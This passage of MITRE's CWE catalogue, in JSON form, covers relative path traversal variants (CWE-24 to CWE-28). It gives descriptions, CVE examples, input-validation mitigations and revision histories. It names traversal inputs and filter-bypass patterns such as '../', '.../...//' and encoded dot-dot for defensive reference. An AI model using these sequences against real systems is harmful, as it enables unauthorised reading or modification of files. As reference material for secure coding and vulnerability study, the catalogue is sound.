sequence in the URL to port 2002.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0160"},{"Reference":"CVE-2001-0467","Description":"\\"\\\\...\\" in web server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0467"},{"Reference":"CVE-2001-0963","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0963"},{"Reference":"CVE-2001-1193","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1193"},{"Reference":"CVE-2001-1131","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1131"},{"Reference":"CVE-2001-0480","Description":"read of arbitrary files and directories using GET or CD with \\"...\\" in Windows-based FTP server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0480"},{"Reference":"CVE-2002-0288","Description":"read files using \\".\\" and Unicode-encoded \\"/\\" or \\"\\\\\\" characters in the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0288"},{"Reference":"CVE-2003-0313","Description":"Directory listing of web server using \\"...\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0313"},{"Reference":"CVE-2005-1658","Description":"Triple dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1658"},{"Reference":"CVE-2000-0240","Description":"read files via \\"/........../\\" in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0240"},{"Reference":"CVE-2000-0773","Description":"read files via \\"....\\" in web server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0773"},{"Reference":"CVE-1999-1082","Description":"read files via \\"......\\" in web server (doubled triple dot?)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1082"},{"Reference":"CVE-2004-2121","Description":"read files via \\"......\\" in web server (doubled triple dot?)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2121"},{"Reference":"CVE-2001-0491","Description":"multiple attacks using \\"..\\", \\"...\\", and \\"....\\" in different commands","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0491"},{"Reference":"CVE-2001-0615","Description":"\\"...\\" or \\"....\\" in chat server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0615"},{"Reference":"CVE-2005-2169","Description":"chain: \\".../...//\\" bypasses protection mechanism using regexp\'s that remove \\"../\\" resulting in collapse into an unsafe value \\"../\\" (CWE-182) and resultant path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169"},{"Reference":"CVE-2005-0202","Description":"\\".../....///\\" bypasses regexp\'s that remove \\"./\\" and \\"../\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0202"},{"Reference":"CVE-2004-1670","Description":"Mail server allows remote attackers to create arbitrary directories via a \\"..\\" or rename arbitrary files via a \\"....//\\" in user supplied parameters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1670"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Relative Path Traversal"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"139"}},{"attr":{"@_CAPEC_ID":"76"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-192"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, "Filenames and Paths", Page 503"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"24":{"attr":{"@_ID":"24","@_Name":"Path Traversal: \'../filedir\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \\"../\\" sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \\"../\\" manipulation is the canonical manipulation for operating systems that use \\"/\\" as directory separators, such as UNIX- and Linux-based systems. In some cases, it is useful for bypassing protection schemes in environments for which \\"/\\" is supported but not the primary separator, such as Windows, which uses \\"\\\\\\" but can also accept \\"/\\"."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'../filedir"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Dot Dot Slash - \'../filedir\'","attr":{"@_Date":"2008-04-11"}}}},"25":{"attr":{"@_ID":"25","@_Name":"Path Traversal: \'/../filedir\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \\"/../\\" sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","Sometimes a program checks for \\"../\\" at the beginning of the input, so a \\"/../\\" can bypass that check."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'/../filedir"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Leading Dot Dot Slash - \'/../filedir\'","attr":{"@_Date":"2008-04-11"}}}},"26":{"attr":{"@_ID":"26","@_Name":"Path Traversal: \'/dir/../filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \\"/dir/../filename\\" sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'/dir/../filename\' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only checks for \\"../\\" at the beginning of the input, so a \\"/../\\" can bypass that check."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'/directory/../filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Leading Directory Dot Dot Slash - \'/directory/../filename\'","attr":{"@_Date":"2008-04-11"}}}},"27":{"attr":{"@_ID":"27","@_Name":"Path Traversal: \'dir/../../filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize multiple internal \\"../\\" sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'directory/../../filename\' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only removes one \\"../\\" sequence, so multiple \\"../\\" can bypass that check. Alternately, this manipulation could be used to bypass a check for \\"../\\" at the beginning of the pathname, moving up more than one directory level."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0298","Description":"Server allows remote attackers to cause a denial of service via certain HTTP GET requests containing a %2e%2e (encoded dot-dot), several \\"/../\\" sequences, or several \\"../\\" in a URI.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0298"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'directory/../../filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Directory Doubled Dot Dot Slash - \'directory/../../filename\'","attr":{"@_Date":"2008-04-11"}}}},"28":{"attr":{"@_ID":"28","@_Name":"Path Traversal: \'..\\\\filedir\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \\"..\\\\\\" sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'..\\\\\' manipulation is the canonical manipulation for operating systems that use \\"\\\\\\" as directory separators, such as Windows. However, it is also useful for bypassing path traversal protection schemes that only assume that the \\"/\\" separator is valid."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two 